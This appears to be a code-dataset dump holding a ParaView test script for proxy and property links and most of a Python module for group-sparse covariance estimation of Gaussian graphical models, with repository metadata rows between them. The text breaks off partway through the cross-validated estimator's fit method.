print("{}\t:{}".format(desc, char))
|
SilverWingedSeraph/sws-dotfiles
|
scripts/emoji-to-scl.py
|
Python
|
apache-2.0
| 358,856
|
[
"CRYSTAL",
"EPW",
"FLEUR",
"Octopus"
] |
dd727bd718039420e8b80f07f0a7b7a98f2d44e3bf4cbb6a21d399f244b98457
|
# Tests links between proxies and properties.
import os
import os.path
import sys
from paraview import servermanager
from paraview import smtesting
smtesting.ProcessCommandLineArguments()
servermanager.Connect()
pvsm_file = os.path.join(smtesting.SMStatesDir, "ProxyPropertyLinks.pvsm")
print "State file: %s" % pvsm_file
smtesting.LoadServerManagerState(pvsm_file)
pxm = servermanager.ProxyManager()
sphere1 = pxm.GetProxy("sources", "Sphere1")
sphere2 = pxm.GetProxy("sources", "Sphere2")
sphere3 = pxm.GetProxy("sources", "Sphere3")
# Create links.
proxyLink = servermanager.vtkSMProxyLink()
proxyLink.AddLinkedProxy(sphere1.SMProxy, 1) # Input
proxyLink.AddLinkedProxy(sphere2.SMProxy, 2) # Output
pxm.RegisterLink("MyProxyLink", proxyLink)
proxyLink = None
propertyLink = servermanager.vtkSMPropertyLink()
propertyLink.AddLinkedProperty(sphere3.SMProxy, "EndTheta", 1) # Input.
propertyLink.AddLinkedProperty(sphere1.SMProxy, "StartTheta", 2) # Output.
pxm.RegisterLink("MyPropertyLink", propertyLink)
propertyLink = None
temp_state = os.path.join(smtesting.TempDir,"links_temp.pvsm")
pxm.SaveState(temp_state)
sphere1 = None
sphere2 = None
sphere3 = None
pxm.UnRegisterProxies()
pxm.UnRegisterAllLinks()
# Load the saved state which also has the links.
smtesting.LoadServerManagerState(temp_state)
try:
os.remove(saved_state)
except:
pass
sphere1 = pxm.GetProxy("sources", "Sphere1")
sphere2 = pxm.GetProxy("sources", "Sphere2")
sphere3 = pxm.GetProxy("sources", "Sphere3")
# Do some changes.
sphere1.GetProperty("StartPhi").SetElement(0, 25)
sphere1.UpdateVTKObjects()
sphere3.GetProperty("EndTheta").SetElement(0, 100)
sphere3.GetProperty("ThetaResolution").SetElement(0, 10)
sphere3.GetProperty("PhiResolution").SetElement(0, 10)
sphere3.UpdateVTKObjects()
rmProxy = servermanager.GetRenderView()
rmProxy.StillRender()
if not smtesting.DoRegressionTesting():
# This will lead to VTK object leaks.
sys.exit(1)
|
HopeFOAM/HopeFOAM
|
ThirdParty-0.1/ParaView-5.0.1/ParaViewCore/ServerManager/Default/Testing/Python/ProxyPropertyLinks.py
|
Python
|
gpl-3.0
| 1,944
|
[
"ParaView",
"VTK"
] |
183743f20bfcfd53a48c69ca2c8cd4cec3ed90085b132b1a46dc3ca0123ead1f
|
"""
Implementation of algorithm for sparse multi-subjects learning of Gaussian
graphical models.
"""
# Authors: Philippe Gervais
# License: simplified BSD
import warnings
import collections
import operator
import itertools
import numpy as np
import scipy.linalg
import sklearn.cross_validation
import sklearn.covariance
from sklearn.utils.extmath import fast_logdet
from sklearn.covariance import empirical_covariance
from sklearn.base import BaseEstimator
from sklearn.externals.joblib import Memory, delayed, Parallel
from ._utils import CacheMixin
from ._utils import logger
from ._utils.testing import is_spd
def compute_alpha_max(emp_covs, n_samples):
"""Compute the critical value of the regularization parameter.
Above this value, the precisions matrices computed by
group_sparse_covariance are diagonal (complete sparsity)
This function also returns the value below which the precision
matrices are fully dense (i.e. minimal number of zero coefficients).
Parameters
----------
emp_covs : array-like, shape (n_features, n_features, n_subjects)
covariance matrix for each subject.
n_samples : array-like, shape (n_subjects,)
number of samples used in the computation of every covariance matrix.
n_samples.sum() can be arbitrary.
Returns
-------
alpha_max : float
minimal value for the regularization parameter that gives a
fully sparse matrix.
alpha_min : float
minimal value for the regularization parameter that gives a fully
dense matrix.
See also
--------
The formula used in this function was derived using the same method as in:
Duchi, John, Stephen Gould, and Daphne Koller. 'Projected Subgradient
Methods for Learning Sparse Gaussians'. ArXiv E-prints 1206 (1 June
2012): 3249.
"""
A = np.copy(emp_covs)
n_samples = np.asarray(n_samples).copy()
n_samples /= n_samples.sum()
for k in range(emp_covs.shape[-1]):
# Set diagonal to zero
A[..., k].flat[::A.shape[0] + 1] = 0
A[..., k] *= n_samples[k]
norms = np.sqrt((A ** 2).sum(axis=-1))
return np.max(norms), np.min(norms[norms > 0])
def _update_submatrix(full, sub, sub_inv, p, h, v):
"""Update submatrix and its inverse.
sub_inv is the inverse of the submatrix of "full" obtained by removing
the p-th row and column.
sub_inv is modified in-place. After execution of this function, it contains
the inverse of the submatrix of "full" obtained by removing the n+1-th row
and column.
This computation is based on the Sherman-Woodbury-Morrison identity.
"""
n = p - 1
v[:n + 1] = full[:n + 1, n]
v[n + 1:] = full[n + 2:, n]
h[:n + 1] = full[n, :n + 1]
h[n + 1:] = full[n, n + 2:]
# change row: first usage of SWM identity
coln = sub_inv[:, n:n + 1] # 2d array, useful for sub_inv below
V = h - sub[n, :]
coln = coln / (1. + np.dot(V, coln))
# The following line is equivalent to
# sub_inv -= np.outer(coln, np.dot(V, sub_inv))
sub_inv -= np.dot(coln, np.dot(V, sub_inv)[np.newaxis, :])
sub[n, :] = h
# change column: second usage of SWM identity
rown = sub_inv[n:n + 1, :] # 2d array, useful for sub_inv below
U = v - sub[:, n]
rown = rown / (1. + np.dot(rown, U))
# The following line is equivalent to (but faster)
# sub_inv -= np.outer(np.dot(sub_inv, U), rown)
sub_inv -= np.dot(np.dot(sub_inv, U)[:, np.newaxis], rown)
sub[:, n] = v # equivalent to sub[n, :] += U
# Make sub_inv symmetric (overcome some numerical limitations)
sub_inv += sub_inv.T.copy()
sub_inv /= 2.
def _assert_submatrix(full, sub, n):
"""Check that "sub" is the matrix obtained by removing the p-th col and row
in "full". Used only for debugging.
"""
true_sub = np.empty_like(sub)
true_sub[:n, :n] = full[:n, :n]
true_sub[n:, n:] = full[n + 1:, n + 1:]
true_sub[:n, n:] = full[:n, n + 1:]
true_sub[n:, :n] = full[n + 1:, :n]
np.testing.assert_almost_equal(true_sub, sub)
def group_sparse_covariance(subjects, alpha, max_iter=50, tol=1e-3, verbose=0,
probe_function=None, precisions_init=None,
debug=False):
"""Compute sparse precision matrices and covariance matrices.
The precision matrices returned by this function are sparse, and share a
common sparsity pattern: all have zeros at the same location. This is
achieved by simultaneous computation of all precision matrices at the
same time.
Running time is linear on max_iter, and number of subjects (len(subjects)),
but cubic on number of features (subjects[0].shape[1]).
Parameters
==========
subjects : list of numpy.ndarray
input subjects. Each subject is a 2D array, whose columns contain
signals. Each array shape must be (sample number, feature number).
The sample number can vary from subject to subject, but all subjects
must have the same number of features (i.e. of columns).
alpha : float
regularization parameter. With normalized covariances matrices and
number of samples, sensible values lie in the [0, 1] range(zero is
no regularization: output is not sparse)
max_iter : int, optional
maximum number of iterations.
tol : positive float or None, optional
The tolerance to declare convergence: if the duality gap goes below
this value, optimization is stopped. If None, no check is performed.
verbose : int, optional
verbosity level. Zero means "no message".
probe_function : callable or None
This value is called before the first iteration and after each
iteration. If it returns True, then optimization is stopped
prematurely.
The function is given as arguments (in that order):
- empirical covariances (ndarray),
- number of samples for each subject (ndarray),
- regularization parameter (float)
- maximum iteration number (integer)
- tolerance (float)
- current iteration number (integer). -1 means "before first iteration"
- current value of precisions (ndarray).
- previous value of precisions (ndarray). None before first iteration.
precisions_init: numpy.ndarray
initial value of the precision matrices. If not provided, a diagonal
matrix with the variances of each input signal is used.
debug : bool, optional
if True, perform checks during computation. It can help find
numerical problems, but increases computation time a lot.
Returns
=======
emp_covs : numpy.ndarray, shape (n_features, n_features, n_subjects)
empirical covariances matrices
precisions : numpy.ndarray, shape (n_features, n_features, n_subjects)
estimated precision matrices
Notes
=====
The present algorithm is based on:
Jean Honorio and Dimitris Samaras.
"Simultaneous and Group-Sparse Multi-Task Learning of Gaussian Graphical
Models". arXiv:1207.4255 (17 July 2012). http://arxiv.org/abs/1207.4255.
"""
emp_covs, n_samples = empirical_covariances(
subjects, assume_centered=False)
precisions = _group_sparse_covariance(
emp_covs, n_samples, alpha, max_iter=max_iter, tol=tol,
verbose=verbose, precisions_init=precisions_init,
probe_function=probe_function, debug=debug)
return emp_covs, precisions
def _group_sparse_covariance(emp_covs, n_samples, alpha, max_iter=10, tol=1e-3,
precisions_init=None, probe_function=None,
verbose=0, debug=False):
"""Internal version of group_sparse_covariance.
See its docstring for details.
"""
if tol == -1:
tol = None
if not isinstance(alpha, (int, float)) or alpha < 0:
raise ValueError("Regularization parameter alpha must be a "
"positive number.\n"
"You provided: {0}".format(str(alpha)))
n_subjects = emp_covs.shape[-1]
n_features = emp_covs[0].shape[0]
n_samples = np.asarray(n_samples)
n_samples /= n_samples.sum() # essential for numerical stability
# Check diagonal normalization.
ones = np.ones(emp_covs.shape[0])
for k in range(n_subjects):
if (abs(emp_covs[..., k].flat[::emp_covs.shape[0] + 1] - ones)
> 0.1).any():
warnings.warn("input signals do not all have unit variance. This "
"can lead to numerical instability.")
break
if precisions_init is None:
# Fortran order make omega[..., k] contiguous, which is often useful.
omega = np.ndarray(shape=emp_covs.shape, dtype=np.float,
order="F")
for k in range(n_subjects):
# Values on main diagonals are far from zero, because they
# are timeseries energy.
omega[..., k] = np.diag(1. / np.diag(emp_covs[..., k]))
else:
omega = precisions_init.copy()
# Preallocate arrays
y = np.ndarray(shape=(n_subjects, n_features - 1), dtype=np.float)
u = np.ndarray(shape=(n_subjects, n_features - 1), dtype=np.float)
y_1 = np.ndarray(shape=(n_subjects, n_features - 2), dtype=np.float)
h_12 = np.ndarray(shape=(n_subjects, n_features - 2), dtype=np.float)
q = np.ndarray(shape=(n_subjects,), dtype=np.float)
aq = np.ndarray(shape=(n_subjects,), dtype=np.float) # temp. array
c = np.ndarray(shape=(n_subjects,), dtype=np.float)
W = np.ndarray(shape=(omega.shape[0] - 1, omega.shape[1] - 1,
omega.shape[2]),
dtype=np.float, order="F")
W_inv = np.ndarray(shape=W.shape, dtype=np.float, order="F")
# Auxilliary arrays.
v = np.ndarray((omega.shape[0] - 1,), dtype=np.float)
h = np.ndarray((omega.shape[1] - 1,), dtype=np.float)
# Optional.
tolerance_reached = False
max_norm = None
omega_old = np.empty_like(omega)
if probe_function is not None:
# iteration number -1 means called before iteration loop.
probe_function(emp_covs, n_samples, alpha, max_iter, tol,
-1, omega, None)
probe_interrupted = False
# Start optimization loop. Variables are named following (mostly) the
# Honorio-Samaras paper notations.
# Used in the innermost loop. Computed here to save some computation.
alpha2 = alpha ** 2
for n in xrange(max_iter):
if max_norm is not None:
suffix = (" variation (max norm): {max_norm:.3e} ".format(
max_norm=max_norm))
else:
suffix = ""
logger.log("* iteration {iter_n:d} ({percentage:.0f} %){suffix} ..."
"".format(iter_n=n, percentage=100. * n / max_iter,
suffix=suffix), verbose=verbose)
omega_old[...] = omega
for p in xrange(n_features):
if p == 0:
# Initial state: remove first col/row
W = omega[1:, 1:, :].copy() # stack of W(k)
W_inv = np.ndarray(shape=W.shape, dtype=np.float)
for k in xrange(W.shape[2]):
# stack of W^-1(k)
W_inv[..., k] = scipy.linalg.inv(W[..., k])
if debug:
np.testing.assert_almost_equal(
np.dot(W_inv[..., k], W[..., k]),
np.eye(W_inv[..., k].shape[0]), decimal=10)
_assert_submatrix(omega[..., k], W[..., k], p)
assert(is_spd(W_inv[..., k]))
else:
# Update W and W_inv
if debug:
omega_orig = omega.copy()
for k in range(n_subjects):
_update_submatrix(omega[..., k],
W[..., k], W_inv[..., k], p, h, v)
if debug:
_assert_submatrix(omega[..., k], W[..., k], p)
assert(is_spd(W_inv[..., k], decimal=14))
np.testing.assert_almost_equal(
np.dot(W[..., k], W_inv[..., k]),
np.eye(W_inv[..., k].shape[0]), decimal=10)
if debug:
# Check that omega has not been modified.
np.testing.assert_almost_equal(omega_orig, omega)
# In the following lines, implicit loop on k (subjects)
# Extract y and u
y[:, :p] = omega[:p, p, :].T
y[:, p:] = omega[p + 1:, p, :].T
u[:, :p] = emp_covs[:p, p, :].T
u[:, p:] = emp_covs[p + 1:, p, :].T
for m in xrange(n_features - 1):
# Coordinate descent on y
# T(k) -> n_samples[k]
# v(k) -> emp_covs[p, p, k]
# h_22(k) -> W_inv[m, m, k]
# h_12(k) -> W_inv[:m, m, k], W_inv[m+1:, m, k]
# y_1(k) -> y[k, :m], y[k, m+1:]
# u_2(k) -> u[k, m]
h_12[:, :m] = W_inv[:m, m, :].T
h_12[:, m:] = W_inv[m + 1:, m, :].T
y_1[:, :m] = y[:, :m]
y_1[:, m:] = y[:, m + 1:]
c[:] = - n_samples * (
emp_covs[p, p, :] * (h_12 * y_1).sum(axis=1) + u[:, m]
)
c2 = np.sqrt(np.dot(c, c))
# x -> y[:][m]
if c2 <= alpha:
y[:, m] = 0 # x* = 0
else:
# q(k) -> T(k) * v(k) * h_22(k)
# \lambda -> gamma (lambda is a Python keyword)
q[:] = n_samples * emp_covs[p, p, :] * W_inv[m, m, :]
if debug:
assert(np.all(q > 0))
# x* = \lambda* diag(1 + \lambda q)^{-1} c
# Newton-Raphson loop. Loosely based on Scipy's.
# Tolerance does not seem to be important for numerical
# stability (tolerance of 1e-2 works) but has an effect on
# overall convergence rate (the tighter the better.)
gamma = 0. # initial value
# Precompute some quantities
cc = c * c
two_ccq = 2. * cc * q
for _ in itertools.repeat(None, 100):
# Function whose zero must be determined (fval) and
# its derivative (fder).
# Written inplace to save some function calls.
aq = 1. + gamma * q
aq2 = aq * aq
fder = (two_ccq / (aq2 * aq)).sum()
if fder == 0:
msg = "derivative was zero."
warnings.warn(msg, RuntimeWarning)
break
fval = - (alpha2 - (cc / aq2).sum()) / fder
gamma = fval + gamma
if abs(fval) < 1.5e-8:
break
if abs(fval) > 0.1:
warnings.warn("Newton-Raphson step did not converge.\n"
"This may indicate a badly conditioned "
"system.")
if debug:
assert gamma >= 0., gamma
y[:, m] = (gamma * c) / aq # x*
# Copy back y in omega (column and row)
omega[:p, p, :] = y[:, :p].T
omega[p + 1:, p, :] = y[:, p:].T
omega[p, :p, :] = y[:, :p].T
omega[p, p + 1:, :] = y[:, p:].T
for k in xrange(n_subjects):
omega[p, p, k] = 1. / emp_covs[p, p, k] + np.dot(
np.dot(y[k, :], W_inv[..., k]), y[k, :])
if debug:
assert(is_spd(omega[..., k]))
if probe_function is not None:
if probe_function(emp_covs, n_samples, alpha, max_iter, tol,
n, omega, omega_old) is True:
probe_interrupted = True
logger.log("probe_function interrupted loop", verbose=verbose,
msg_level=2)
break
# Compute max of variation
omega_old -= omega
omega_old = abs(omega_old)
max_norm = omega_old.max()
if tol is not None and max_norm < tol:
logger.log("tolerance reached at iteration number {0:d}: {1:.3e}"
"".format(n + 1, max_norm), verbose=verbose)
tolerance_reached = True
break
if tol is not None and not tolerance_reached and not probe_interrupted:
warnings.warn("Maximum number of iterations reached without getting "
"to the requested tolerance level.")
return omega
class GroupSparseCovariance(BaseEstimator, CacheMixin):
"""Covariance and precision matrix estimator.
Parameters
----------
alpha : float
regularization parameter. With normalized covariances matrices and
number of samples, sensible values lie in the [0, 1] range(zero is
no regularization: output is not sparse)
tol : positive float, optional
The tolerance to declare convergence: if the dual gap goes below
this value, iterations are stopped
max_iter : int, optional
maximum number of iterations. The default value (10) is rather
conservative.
verbose : int, optional
verbosity level. Zero means "no message".
memory : instance of joblib.Memory or string, optional
Used to cache the masking process.
By default, no caching is done. If a string is given, it is the
path to the caching directory.
memory_level : int, optional
Caching aggressiveness. Higher values mean more caching.
Attributes
----------
`covariances_` : numpy.ndarray, shape (n_features, n_features, n_subjects)
empirical covariance matrices.
`precisions_` : numpy.ndarraye, shape (n_features, n_features, n_subjects)
precisions matrices estimated using the group-sparse algorithm.
Notes
------
The model used has been introduced in:
Gael Varoquaux, et al. `Brain Covariance Selection: Better Individual
Functional Connectivity Models Using Population Prior
<http://arxiv.org/abs/1008.5071>`_'.
The algorithm used is based on what is described in:
Jean Honorio and Dimitris Samaras.
"Simultaneous and Group-Sparse Multi-Task Learning of Gaussian Graphical
Models". http://arxiv.org/abs/1207.4255.
"""
def __init__(self, alpha=0.1, tol=1e-3, max_iter=10, verbose=1,
memory=Memory(cachedir=None), memory_level=0):
self.alpha = alpha
self.tol = tol
self.max_iter = max_iter
self.memory = memory
self.memory_level = memory_level
self.verbose = verbose
def fit(self, subjects, y=None):
"""Fits the group sparse precision model according to the given
training data and parameters.
Parameters
----------
subjects : list of numpy.ndarray with shapes (n_samples, n_features)
input subjects. Each subject is a 2D array, whose columns contain
signals. Sample number can vary from subject to subject, but all
subjects must have the same number of features (i.e. of columns).
Attributes
----------
`covariances_` : numpy.ndarray
empirical covariances
`precisions_` : numpy.ndarray
precision matrices
Returns
-------
self : GroupSparseCovariance instance
the object itself. Useful for chaining operations.
"""
logger.log("Computing covariance matrices", verbose=self.verbose)
self.covariances_, n_samples = empirical_covariances(
subjects, assume_centered=False)
logger.log("Computing precision matrices", verbose=self.verbose)
ret = self._cache(
_group_sparse_covariance, memory_level=1)(
self.covariances_, n_samples, self.alpha,
tol=self.tol, max_iter=self.max_iter,
verbose=self.verbose - 1, debug=False)
self.precisions_ = ret
return self
def empirical_covariances(subjects, assume_centered=False, standardize=False):
"""Compute empirical covariances for several signals.
Parameters
----------
subjects : list of numpy.ndarray, shape for each (n_samples, n_features)
input subjects. Each subject is a 2D array, whose columns contain
signals. Sample number can vary from subject to subject, but all
subjects must have the same number of features (i.e. of columns).
assume_centered : bool, optional
if True, assume that all input signals are centered. This slightly
decreases computation time by avoiding useless computation.
standardize : bool, optional
if True, set every signal variance to one before computing their
covariance matrix (i.e. compute a correlation matrix).
Returns
-------
emp_covs : numpy.ndarray, shape : (feature number, feature number, subject number)
empirical covariances.
n_samples : numpy.ndarray, shape: (subject number,)
number of samples for each subject. dtype is np.float.
"""
if not hasattr(subjects, "__iter__"):
raise ValueError("'subjects' input argument must be an iterable. "
"You provided {0}".format(subjects.__class__))
n_subjects = [s.shape[1] for s in subjects]
if len(set(n_subjects)) > 1:
raise ValueError("All subjects must have the same number of "
"features.\nYou provided: {0}".format(str(n_subjects))
)
n_subjects = len(subjects)
n_features = subjects[0].shape[1]
# Enable to change dtype here because depending on user, conversion from
# single precision to double will be required or not.
emp_covs = np.empty((n_features, n_features, n_subjects), order="F")
for k, s in enumerate(subjects):
if standardize:
s = s / s.std(axis=0) # copy on purpose
M = empirical_covariance(s, assume_centered=assume_centered)
# Force matrix symmetry, for numerical stability
# of _group_sparse_covariance
emp_covs[..., k] = M + M.T
emp_covs /= 2
n_samples = np.asarray([s.shape[0] for s in subjects], dtype=np.float)
return emp_covs, n_samples
def group_sparse_scores(precisions, n_samples, emp_covs, alpha,
duality_gap=False, debug=False):
"""Compute scores used by group_sparse_covariance.
The log-likelihood of a given list of empirical covariances /
precisions.
Parameters
----------
precisions : numpy.ndarray, shape (n_features, n_features, n_subjects)
estimated precisions.
n_samples : array-like, shape (n_subjects,)
number of samples used in estimating each subject in "precisions".
n_samples.sum() must be equal to 1.
emp_covs : numpy.ndarray, shape (n_features, n_features, n_subjects)
empirical covariance matrix
alpha : float
regularization parameter
duality_gap : bool, optional
if True, also returns a duality gap upper bound.
debug : bool, optional
if True, some consistency checks are performed to help solving
numerical problems
Returns
-------
log_lik : float
log-likelihood of precisions on the given covariances. This is the
opposite of the loss function, without the regularization term
objective : float
value of objective function. This is the value minimized by
group_sparse_covariance()
duality_gap : float
duality gap upper bound. The returned bound is tight: it vanishes for
the optimal precision matrices
"""
n_features, _, n_subjects = emp_covs.shape
log_lik = 0
for k in range(n_subjects):
log_lik_k = - np.sum(emp_covs[..., k] * precisions[..., k])
log_lik_k += fast_logdet(precisions[..., k])
log_lik += n_samples[k] * log_lik_k
l2 = np.sqrt((precisions ** 2).sum(axis=-1))
l12 = l2.sum() - np.diag(l2).sum() # Do not count diagonal terms
objective = alpha * l12 - log_lik
ret = (log_lik, objective)
# Compute duality gap if requested
if duality_gap is True:
A = np.empty(precisions.shape, dtype=np.float, order="F")
for k in range(n_subjects):
# TODO: can be computed more efficiently using W_inv. See
# Friedman, Jerome, Trevor Hastie, and Robert Tibshirani.
# 'Sparse Inverse Covariance Estimation with the Graphical Lasso'.
# Biostatistics 9, no. 3 (1 July 2008): 432-441.
precisions_inv = scipy.linalg.inv(precisions[..., k])
if debug:
assert is_spd(precisions_inv)
A[..., k] = n_samples[k] * (precisions_inv - emp_covs[..., k])
if debug:
np.testing.assert_almost_equal(A[..., k], A[..., k].T)
# Project A on the set of feasible points
alpha_max = np.sqrt((A ** 2).sum(axis=-1))
mask = alpha_max > alpha
for k in range(A.shape[-1]):
A[mask, k] *= alpha / alpha_max[mask]
# Set zeros on diagonals. Essential to get an always positive
# duality gap.
A[..., k].flat[::A.shape[0] + 1] = 0
alpha_max = np.sqrt((A ** 2).sum(axis=-1)).max()
dual_obj = 0 # dual objective
for k in range(n_subjects):
B = emp_covs[..., k] + A[..., k] / n_samples[k]
dual_obj += n_samples[k] * (n_features + fast_logdet(B))
# The previous computation can lead to a non-feasible point, because
# one of the Bs may not be positive definite.
# Use another value in this case, that ensure positive definiteness
# of B. The upper bound on the duality gap is not tight in the
# following, but is smaller than infinity, which is better in any case.
if not np.isfinite(dual_obj):
for k in range(n_subjects):
A[..., k] = - n_samples[k] * emp_covs[..., k]
A[..., k].flat[::A.shape[0] + 1] = 0
alpha_max = np.sqrt((A ** 2).sum(axis=-1)).max()
# the second value (0.05 is arbitrary: positive in ]0,1[)
gamma = min((alpha / alpha_max, 0.05))
dual_obj = 0
for k in range(n_subjects):
# add gamma on the diagonal
B = ((1. - gamma) * emp_covs[..., k]
+ gamma * np.eye(emp_covs.shape[0]))
dual_obj += n_samples[k] * (n_features + fast_logdet(B))
gap = objective - dual_obj
ret = ret + (gap,)
return ret
def group_sparse_covariance_path(train_subjs, alphas, test_subjs=None,
tol=1e-3, max_iter=10, precisions_init=None,
verbose=0, debug=False, probe_function=None):
"""Get estimated precision matrices for different values of alpha.
Calling this function is faster than calling group_sparse_covariance()
repeatedly, because it makes use of the first result to initialize the
next computation.
Parameters
----------
train_subjs : list of numpy.ndarray
list of signals.
alphas : list of float
values of alpha to use. Best results for sorted values (decreasing)
test_subjs : list of numpy.ndarray
list of signals, independent from those in train_subjs, on which to
compute a score. If None, no score is computed.
verbose : int
verbosity level
tol, max_iter, debug, precisions_init :
Passed to group_sparse_covariance(). See the corresponding docstring
for details.
probe_function : callable
This value is called before the first iteration and after each
iteration. If it returns True, then optimization is stopped
prematurely.
The function is given as arguments (in that order):
- empirical covariances (ndarray),
- number of samples for each subject (ndarray),
- regularization parameter (float)
- maximum iteration number (integer)
- tolerance (float)
- current iteration number (integer). -1 means "before first iteration"
- current value of precisions (ndarray).
- previous value of precisions (ndarray). None before first iteration.
Returns
-------
precisions_list : list of numpy.ndarray
estimated precisions for each value of alpha provided. The length of
this list is the same as that of parameter "alphas".
scores : list of float
for each estimated precision, score obtained on the test set. Output
only if test_subjs is not None.
"""
train_covs, train_n_samples = empirical_covariances(
train_subjs, assume_centered=False, standardize=True)
scores = []
precisions_list = []
for alpha in alphas:
precisions = _group_sparse_covariance(
train_covs, train_n_samples, alpha, tol=tol, max_iter=max_iter,
precisions_init=precisions_init, verbose=verbose, debug=debug,
probe_function=probe_function)
# Compute log-likelihood
if test_subjs is not None:
test_covs, _ = empirical_covariances(
test_subjs, assume_centered=False, standardize=True)
scores.append(group_sparse_scores(precisions, train_n_samples,
test_covs, 0)[0])
precisions_list.append(precisions)
precisions_init = precisions
if test_subjs is not None:
return precisions_list, scores
else:
return precisions_list
class EarlyStopProbe(object):
"""Callable probe for early stopping in GroupSparseCovarianceCV.
Stop optimizing as soon as the score on the test set starts decreasing.
An instance of this class is supposed to be passed in the probe_function
argument of group_sparse_covariance().
"""
def __init__(self, test_subjs, verbose=1):
self.test_emp_covs, _ = empirical_covariances(test_subjs)
self.verbose = verbose
def __call__(self, emp_covs, n_samples, alpha, max_iter, tol,
iter_n, omega, prev_omega):
log_lik, _ = group_sparse_scores(
omega, n_samples, self.test_emp_covs, alpha)
if iter_n > -1 and self.last_log_lik > log_lik:
logger.log("Log-likelihood on test set is decreasing. "
"Stopping at iteration %d"
% iter_n, verbose=self.verbose)
return True
self.last_log_lik = log_lik
class GroupSparseCovarianceCV(BaseEstimator, CacheMixin):
"""Sparse inverse covariance w/ cross-validated choice of the parameter.
A cross-validated value for the regularization parameter is first
determined using several calls to group_sparse_covariance. Then a final
optimization is run to get a value for the precision matrices, using the
selected value of the parameter. Different values of tolerance and of
maximum iteration number can be used in these two phases (see the tol
and tol_cv keyword below for example).
Parameters
----------
alphas : integer
initial number of points in the grid of regularization parameter
values. Each step of grid refinement adds that many points as well.
n_refinements : integer
number of times the initial grid should be refined.
cv : integer
number of folds in a K-fold cross-validation scheme. If None is passed,
defaults to 3.
tol_cv : float
tolerance used to get the optimal alpha value. It has the same meaning
as the `tol` parameter in :func:`group_sparse_covariance`.
max_iter_cv : integer
maximum number of iterations for each optimization, during the alpha-
selection phase.
tol : float
tolerance used during the final optimization for determining precision
matrices value.
max_iter : integer
maximum number of iterations in the final optimization.
verbose : integer
verbosity level. 0 means nothing is printed to the user.
n_jobs : integer
maximum number of cpu cores to use. The number of cores actually used
at the same time cannot exceed the number of folds in folding strategy
(that is, the value of cv).
debug : bool
if True, activates some internal checks for consistency. Only useful
for nilearn developers, not users.
early_stopping : bool
if True, reduce computation time by using a heuristic to reduce the
number of iterations required to get the optimal value for alpha. Be
aware that this can lead to slightly different values for the optimal
alpha compared to early_stopping=False.
Attributes
----------
`covariances_` : numpy.ndarray, shape (n_features, n_features, n_subjects)
covariance matrices, one per subject.
`precisions_` : numpy.ndarray, shape (n_features, n_features, n_subjects)
precision matrices, one per subject. All matrices have the same
sparsity pattern (if a coefficient is zero for a given matrix, it
is also zero for every other.)
`alpha_` : float
penalization parameter value selected.
`cv_alphas_` : list of floats
all values of the penalization parameter explored.
`cv_scores_` : numpy.ndarray, shape (n_alphas, n_folds)
scores obtained on test set for each value of the penalization
parameter explored.
See also
--------
group_sparse_covariance, GroupSparseCovariance,
sklearn.covariance.GraphLassoCV
Notes
-----
The search for the optimal penalization parameter (alpha) is done on an
iteratively refined grid: first the cross-validated scores on a grid are
computed, then a new refined grid is centered around the maximum, and so
on.
"""
def __init__(self, alphas=4, n_refinements=4, cv=None,
tol_cv=1e-2, max_iter_cv=50,
tol=1e-3, max_iter=100, verbose=1,
n_jobs=1, debug=False, early_stopping=True):
self.alphas = alphas
self.n_refinements = n_refinements
self.tol_cv = tol_cv
self.max_iter_cv = max_iter_cv
self.cv = cv
self.tol = tol
self.max_iter = max_iter
self.verbose = verbose
self.n_jobs = n_jobs
self.debug = debug
self.early_stopping = early_stopping
def fit(self, subjects, y=None):
"""Compute cross-validated group-sparse precisions.
Parameters
----------
subjects : list of numpy.ndarray with shapes (n_samples, n_features)
input subjects. Each subject is a 2D array, whose columns contain
signals. Sample number can vary from subject to subject, but all
subjects must have the same number of features (i.e. of columns.)
Attributes
----------
covariances_ : numpy.ndarray, shape (n_features, n_features, n_subjects)
covariance matrices, one per subject.
precisions_ : numpy.ndarray, shape (n_features, n_features, n_subjects)
precision matrices, one per subject. All matrices have the same
sparsity pattern (if a coefficient is zero for a given matrix, it
is also zero for every other.)
alpha_ : float
selected value for penalization parameter.
cv_alphas_ : list of float
all penalization parameter values explored.
cv_scores_ : numpy.ndarray with shape (n_alphas, n_folds)
scores obtained on test set for each value of the penalization
parameter explored.
Returns
=======
self: GroupSparseCovarianceCV
the object instance itself.
"""
# Empirical covariances
emp_covs, n_samples = \
empirical_covariances(subjects, assume_centered=False)
n_subjects = emp_covs.shape[2]
# One cv generator per subject must be created, because each subject
# can have a different number of samples from the others.
cv = []
for k in range(n_subjects):
cv.append(sklearn.cross_validation.check_cv(
self.cv, subjects[k], None, classifier=False))
path = list() # List of (alpha, scores, covs)
n_alphas = self.alphas
if isinstance(n_alphas, collections.Sequence):
alphas = list(self.alphas)
n_alphas = len(alphas)
n_refinements = 1
else:
n_refinements = self.n_refinements
alpha_1, _ = compute_alpha_max(emp_covs, n_samples)
alpha_0 = 1e-2 * alpha_1
alphas = np.logspace(np.log10(alpha_0), np.log10(alpha_1),
n_alphas)[::-1]
covs_init = itertools.repeat(None)
for i in range(n_refinements):
# Compute the cross-validated loss on the current grid
train_test_subjs = []
for train_test in zip(*cv):
assert(len(train_test) == n_subjects)
train_test_subjs.append(zip(*[(subject[train, :],
subject[test, :])
for subject, (train, test)
in zip(subjects, train_test)]))
if self.early_stopping:
probes = [EarlyStopProbe(test_subjs, verbose=self.verbose)
for _, test_subjs in train_test_subjs]
else:
probes = itertools.repeat(None)
this_path = Parallel(n_jobs=self.n_jobs, verbose=self.verbose)(
delayed(group_sparse_covariance_path)(
train_subjs, alphas, test_subjs=test_subjs,
max_iter=self.max_iter_cv, tol=self.tol_cv,
verbose=self.verbose, debug=self.debug,
# Warm restart is useless with early stopping.
precisions_init=None if self.early_stopping else prec_init,
probe_function=probe)
for (train_subjs, test_subjs), prec_init, probe
in zip(train_test_subjs, covs_init, probes))
# this_path[i] is a tuple (precisions_list, scores)
# - scores: scores obtained with the i-th folding, for each value
# of alpha.
# - precisions_list: corresponding precisions matrices, for each
# value of alpha.
precisions_list, scores = zip(*this_path)
# now scores[i][j] is the score for the i-th folding, j-th value of
# alpha (analoguous for precisions_list)
precisions_list = zip(*precisions_list)
scores = [np.mean(sc) for sc in zip(*scores)]
# scores[i] is the mean score obtained for the i-th value of alpha.
path.extend(zip(alphas, scores, precisions_list))
path = sorted(path, key=operator.itemgetter(0), reverse=True)
# Find the maximum score (avoid using the built-in 'max' function
# to have a fully-reproducible selection of the smallest alpha in
# case of equality)
best_score = -np.inf
last_finite_idx = 0
for index, (alpha, this_score, _) in enumerate(path):
